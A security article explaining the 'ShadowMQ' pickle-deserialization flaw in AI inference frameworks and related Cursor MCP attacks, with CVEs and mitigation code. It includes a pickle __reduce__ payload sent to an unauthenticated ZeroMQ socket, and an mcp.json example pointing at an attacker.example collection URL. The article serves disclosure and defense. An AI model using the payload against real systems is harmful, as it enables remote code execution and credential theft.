
Security researchers have uncovered a widespread vulnerability pattern affecting major AI inference frameworks from Meta, Nvidia, Microsoft, and popular open-source projects. The root cause? Unsafe implementation of ZeroMQ messaging with Python pickle deserialization—a dangerous combination that enables remote code execution across the AI ecosystem.
The Discovery: One Flaw, Multiple Victims
A systematic investigation by Oligo Security has revealed that critical security vulnerabilities, in a pattern researchers are calling “ShadowMQ,” have propagated throughout the artificial intelligence infrastructure ecosystem. The issue isn’t isolated to a single vendor; it spans the entire landscape of AI inference engines that power production machine learning deployments.
Understanding the Technical Root Cause
The Dangerous Combination
At the heart of these vulnerabilities lies an architectural decision that seemed innocuous but proved catastrophic: the use of the recv_pyobj() method provided by pyzmq, ZeroMQ’s Python binding, for network communication. This method automatically deserializes incoming data using Python’s pickle module, which is inherently unsafe when processing untrusted input.
The problem compounds when these ZeroMQ sockets are exposed over network interfaces without proper authentication mechanisms. This combination creates a perfect storm where attackers can inject malicious serialized objects that execute arbitrary code when deserialized on the target system.
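To make the pattern concrete, the following is a minimal sketch, not code from any affected project, of a ZeroMQ worker that relies on recv_pyobj(), together with the kind of pickle payload an attacker could send to it. The addresses, class name, and command are hypothetical and chosen purely for illustration.

```python
import pickle
import zmq

# --- Vulnerable receiver (hypothetical sketch, not code from any affected project) ---
# recv_pyobj() is effectively pickle.loads(socket.recv()): whatever bytes arrive on
# the wire are deserialized with pickle, which can execute code during loading.
def run_worker(bind_addr: str = "tcp://0.0.0.0:5555") -> None:
    ctx = zmq.Context.instance()
    sock = ctx.socket(zmq.PULL)
    sock.bind(bind_addr)          # exposed on all interfaces, no authentication
    while True:
        task = sock.recv_pyobj()  # unsafe: pickle-deserializes untrusted input
        print("received task:", task)

# --- Why that matters: a pickle payload can specify code to run on load ---
# A class may define __reduce__ to tell pickle how to "reconstruct" it; an attacker
# simply returns a callable such as os.system and its arguments.
class MaliciousPayload:
    def __reduce__(self):
        import os
        return (os.system, ("id > /tmp/pwned",))  # benign command used for illustration

def send_payload(connect_addr: str = "tcp://victim:5555") -> None:
    ctx = zmq.Context.instance()
    sock = ctx.socket(zmq.PUSH)
    sock.connect(connect_addr)
    sock.send(pickle.dumps(MaliciousPayload()))  # os.system(...) runs on the receiver
```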
How Code Reuse Amplified the Problem
The vulnerability’s reach extends far beyond its origin point due to a common software development practice: code reuse. What began as a single implementation flaw in Meta’s infrastructure became an industry-wide security crisis as developers copied and adapted code between projects.
Security analysis revealed troubling evidence of direct code copying:
- SGLang documentation explicitly acknowledges adaptation from vLLM
- Modular Max Server incorporated vulnerable logic from both vLLM and SGLang
- Nearly identical unsafe patterns appear across different maintainers and organizations
Each time vulnerable code was copied, the security flaw multiplied, creating a cascading effect throughout the AI infrastructure ecosystem.
Affected Platforms and CVE Assignments
Meta’s Llama Framework
The initial vulnerability was discovered in Meta’s Llama large language model framework and is tracked as CVE-2024-50050. CVSS assessments for the flaw ranged from 6.3 to 9.3, depending on the scoring organization.
Meta has since patched this vulnerability, and complementary fixes have been implemented in the pyzmq Python library that provides the underlying ZeroMQ bindings.
NVIDIA TensorRT-LLM
NVIDIA’s inference optimization framework contained the same vulnerability pattern, assigned CVE-2025-23254 with a CVSS score of 8.8. The company addressed this critical flaw in version 0.18.2 of TensorRT-LLM.
vLLM (Open Source)
The popular open-source inference server vLLM received vulnerability designation CVE-2025-30165 with a CVSS score of 8.0. While not fully patched in the traditional sense, the project has mitigated the issue by switching to the V1 engine as the default configuration.
Modular Max Server
Modular’s Max Server infrastructure was assigned CVE-2025-60455. The company has implemented fixes to address the vulnerability in their platform.
Still at Risk
Two additional platforms remain vulnerable at the time of this publication:
- Microsoft Sarathi-Serve: No patch currently available
- SGLang: Partial mitigation implemented, but incomplete fixes leave residual risk
Attack Scenarios and Impact Assessment
What Attackers Can Achieve
The consequences of successful exploitation are severe and multifaceted:
Infrastructure Compromise: An attacker who successfully exploits these vulnerabilities gains arbitrary code execution on inference nodes. Since inference engines typically run with elevated privileges and access to sensitive resources, this provides a powerful foothold within AI infrastructure.
Lateral Movement: Modern AI deployments operate in clustered environments. Compromising a single inference node can enable lateral movement throughout the cluster, potentially affecting entire machine learning pipelines.
Intellectual Property Theft: AI models represent significant intellectual property investments. Attackers with code execution capabilities can exfiltrate proprietary models, training data, and algorithmic implementations.
Resource Hijacking: Compromised inference infrastructure presents an attractive target for cryptocurrency mining operations. The high-performance compute resources typical of AI deployments are ideal for cryptomining, and such abuse can persist undetected for extended periods.
Model Poisoning: Beyond simple theft, attackers could potentially manipulate models or inject backdoors that alter inference results in subtle ways, undermining the integrity of AI-powered decisions.
Extended Threat Surface: Development Environments
The Cursor Browser Vulnerability
Parallel research from Knostic has identified additional attack vectors in AI-assisted development environments. Their investigation focused on Cursor’s integrated browser feature and revealed two distinct exploitation paths:
JavaScript Injection via MCP Servers: Attackers can craft malicious Model Context Protocol (MCP) servers that bypass Cursor’s security controls. When executed, these rogue servers inject code that replaces legitimate login interfaces with credential-harvesting phishing pages.
The attack sequence works as follows:
- User downloads and configures a malicious MCP server via an mcp.json file (a hypothetical example appears after this list)
- The MCP server injects JavaScript into Cursor’s built-in browser
- Injected code redirects users to fake authentication pages
- Credentials are exfiltrated to attacker-controlled infrastructure
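For illustration only, a malicious entry of the kind described in the first step might be declared in mcp.json roughly as follows; the server name, package, and endpoint are invented and do not refer to any real project.

```json
{
  "mcpServers": {
    "docs-helper": {
      "command": "npx",
      "args": ["-y", "innocuous-looking-docs-helper"],
      "env": {
        "COLLECT_URL": "https://attacker.example/collect"
      }
    }
  }
}
```

Nothing in the file itself looks dangerous; the risk lies entirely in what the referenced package does once the IDE launches it.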
Malicious Extension Attacks: Given that Cursor is essentially a fork of Visual Studio Code, it inherits the extension ecosystem’s security challenges. Attackers can develop malicious extensions that inject JavaScript directly into the IDE’s Node.js interpreter.
Once JavaScript execution is achieved within the interpreter context, attackers inherit the IDE’s full privilege set:
- Complete filesystem access
- Ability to modify or replace installed extensions
- Capability to manipulate IDE functions
- Persistence mechanisms that survive IDE restarts
The Broader Implication: Interpreter-Level Compromise
The Cursor vulnerabilities highlight a critical architectural concern that extends beyond individual bugs. When malicious code gains execution within the Node.js interpreter—whether through extensions, MCP servers, or prompt injection—it operates with the same permissions as the IDE itself.
This elevation transforms the development environment into what Knostic describes as a “malware distribution and exfiltration platform.” The compromised IDE can:
- Inject malicious code into projects
- Steal sensitive source code and credentials
- Modify build processes to introduce supply chain compromises
- Establish persistent backdoors in the development workflow
Defense Strategies and Mitigation Guidance
For AI Infrastructure Operators
Immediate Actions:
- Patch Management: Update all inference frameworks to the latest versions that include security fixes
- Network Segmentation: Isolate inference infrastructure behind robust network controls
- Authentication Requirements: Implement strong authentication for all inter-service communication (a minimal pyzmq CURVE sketch follows this list)
- Monitoring Implementation: Deploy detection mechanisms for unusual deserialization activity
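For the authentication item above, pyzmq exposes ZeroMQ’s built-in CURVE mechanism. A minimal sketch of a server socket that only accepts encrypted, key-authenticated peers might look like the following; the certificate paths and bind address are assumptions for illustration.

```python
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator

def run_authenticated_server(bind_addr: str = "tcp://0.0.0.0:5555") -> None:
    ctx = zmq.Context.instance()

    # Start an authenticator thread and restrict which client public keys are accepted.
    auth = ThreadAuthenticator(ctx)
    auth.start()
    auth.configure_curve(domain="*", location="/etc/inference/authorized_clients")

    # Load this server's CURVE keypair (generated once with zmq.auth.create_certificates).
    server_public, server_secret = zmq.auth.load_certificate(
        "/etc/inference/server.key_secret"
    )

    sock = ctx.socket(zmq.PULL)
    sock.curve_secretkey = server_secret
    sock.curve_publickey = server_public
    sock.curve_server = True  # require a CURVE handshake from every peer
    sock.bind(bind_addr)

    while True:
        msg = sock.recv_json()  # structured payloads instead of pickle
        print("task:", msg)
```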
Long-term Architecture Improvements:
- Replace pickle deserialization with safer alternatives such as JSON or Protocol Buffers (see the sketch after this list)
- Implement principle of least privilege for inference service accounts
- Establish secure channels for inter-process communication
- Regular security audits of custom implementations
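As one concrete option for the first item in the list above, pyzmq’s JSON helpers can stand in for the pickle-based calls; the field names and validation step here are illustrative assumptions rather than any project’s actual message schema.

```python
import zmq

# Before (unsafe): sock.send_pyobj(task) / task = sock.recv_pyobj()
# After (safer):   structured JSON with explicit validation of the expected fields.

EXPECTED_FIELDS = {"request_id", "prompt", "max_tokens"}  # illustrative schema

def send_task(sock: zmq.Socket, request_id: str, prompt: str, max_tokens: int) -> None:
    sock.send_json({"request_id": request_id, "prompt": prompt, "max_tokens": max_tokens})

def recv_task(sock: zmq.Socket) -> dict:
    task = sock.recv_json()  # json.loads under the hood: no code execution on load
    if not isinstance(task, dict) or not EXPECTED_FIELDS.issubset(task):
        raise ValueError(f"malformed task: {task!r}")
    return task
```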
For Development Environment Security
IDE Configuration Best Practices:
- Disable Auto-Run Features: Prevent automatic execution of untrusted code
- Extension Vetting: Install only extensions from verified publishers
- MCP Server Auditing: Review source code before deploying MCP servers
- API Key Hygiene: Use minimally scoped API keys for development tools
- Repository Trust Verification: Validate MCP servers from official, trusted repositories
Data Access Controls:
- Audit which data sources MCP servers can access
- Restrict API permissions to minimal required scope
- Monitor for unusual data access patterns
- Implement logging for all MCP server activities
Industry Response and Lessons Learned
The Velocity Problem
Oligo Security researcher Avi Lumelsky contextualized the issue within the broader AI development landscape: “Projects are moving at incredible speed, and it’s common to borrow architectural components from peers. But when code reuse includes unsafe patterns, the consequences ripple outward fast.”
This observation highlights a fundamental tension in modern AI development. The rapid pace of innovation encourages code sharing and reuse to accelerate progress. However, when security-critical code is copied without thorough review, vulnerabilities propagate at the same velocity as innovation.
Breaking the Chain
The ShadowMQ pattern reveals the need for improved security practices in fast-moving technology sectors:
Code Review Culture: Organizations must maintain rigorous security review processes even when adapting code from reputable sources. The origin of code doesn’t guarantee its security posture.
Secure Defaults: Framework developers should prioritize secure-by-default configurations. The fact that unsafe deserialization patterns persisted across multiple projects suggests that secure alternatives weren’t sufficiently obvious or accessible.
Supply Chain Awareness: Understanding the provenance and security characteristics of incorporated code is essential. Teams should maintain awareness of which external components include security-sensitive functionality.
Looking Forward: Securing AI Infrastructure
Industry-Wide Implications
These vulnerabilities underscore that AI infrastructure faces unique security challenges at the intersection of high-performance computing, distributed systems, and machine learning. As AI deployment scales, the attack surface expands proportionally.
Recommendations for Framework Developers
- Security-First Design: Prioritize security considerations in architectural decisions, particularly for network-facing components
- Safer Serialization: Move away from pickle and similar unsafe serialization formats for any network-facing interfaces
- Documentation: Clearly document security considerations when providing reference implementations
- Security Audits: Conduct regular third-party security assessments of critical infrastructure components
Call to Action
Organizations deploying AI inference infrastructure should:
- Conduct immediate vulnerability assessments of their inference platforms (a simple source-scanning sketch follows this list)
- Review network exposure of inference services
- Implement comprehensive monitoring for exploitation attempts
- Establish incident response procedures specific to AI infrastructure compromise
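As a rough first pass on the assessment item above, the unsafe calls are easy to search for. The sketch below simply walks a source tree and flags recv_pyobj, send_pyobj, and pickle.loads call sites; it is a starting point for manual review, not a substitute for a proper audit.

```python
import pathlib
import sys

# Strings whose presence in a Python file warrants a closer manual look.
SUSPECT_CALLS = ("recv_pyobj(", "send_pyobj(", "pickle.loads(")

def scan_tree(root: str) -> None:
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for lineno, line in enumerate(text.splitlines(), start=1):
            if any(marker in line for marker in SUSPECT_CALLS):
                print(f"{path}:{lineno}: {line.strip()}")

if __name__ == "__main__":
    scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
```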
Conclusion
The ShadowMQ vulnerability pattern serves as a stark reminder that even in cutting-edge technology domains, fundamental security principles remain critical. The propagation of unsafe deserialization practices through code reuse demonstrates how quickly vulnerabilities can spread in interconnected software ecosystems.
As artificial intelligence becomes increasingly central to business operations and critical infrastructure, securing AI systems must receive commensurate attention. The industry must balance the velocity of innovation with the rigor of security engineering—a challenge that will only grow more pressing as AI deployment accelerates.
Technical References
CVE Identifiers:
- CVE-2024-50050: Meta Llama Framework (Patched)
- CVE-2025-23254: NVIDIA TensorRT-LLM (Fixed in v0.18.2)
- CVE-2025-30165: vLLM (Mitigated via V1 engine default)
- CVE-2025-60455: Modular Max Server (Fixed)
Vulnerability Source:
- Oligo Security Research Report: “ShadowMQ: How Code Reuse Spread Critical Vulnerabilities Across the AI Ecosystem”
- Knostic Security Research: “MCP Hijacked: Cursor Browser Exploitation”
Affected Technologies:
- ZeroMQ (pyzmq library)
- Python pickle module
- Various AI inference frameworks and development tools
This article is based on security research published by Oligo Security and Knostic. Organizations using affected technologies should consult vendor security advisories and apply recommended patches immediately.